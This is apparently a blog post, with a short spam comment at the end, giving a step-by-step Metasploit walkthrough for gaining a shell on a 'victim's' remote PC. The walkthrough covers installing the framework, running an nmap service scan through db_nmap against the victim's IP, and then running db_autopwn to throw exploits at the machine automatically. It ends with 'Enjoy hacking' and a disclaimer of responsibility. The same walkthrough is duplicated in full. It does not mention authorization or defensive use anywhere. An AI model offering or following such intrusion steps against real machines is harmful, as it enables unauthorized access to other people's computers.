Hello friends today i am sharing how to use metasploit to exploit a remote computer.
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Enjoy hacking
Here we go :
NOTE : I am not responsible for what you do with this information.
Download latest Metasploit framework from its official site - www.metasploit.com
Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.
Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.
Now launch msfconsole.
It'll take sometime as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load the Nmap up.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC!
Now you have full access to that PC you can do anything with this PC.
Enjoy hacking
Lot of useful points are there. Its really keeps me updated.
ReplyDeleteAndroid apps developer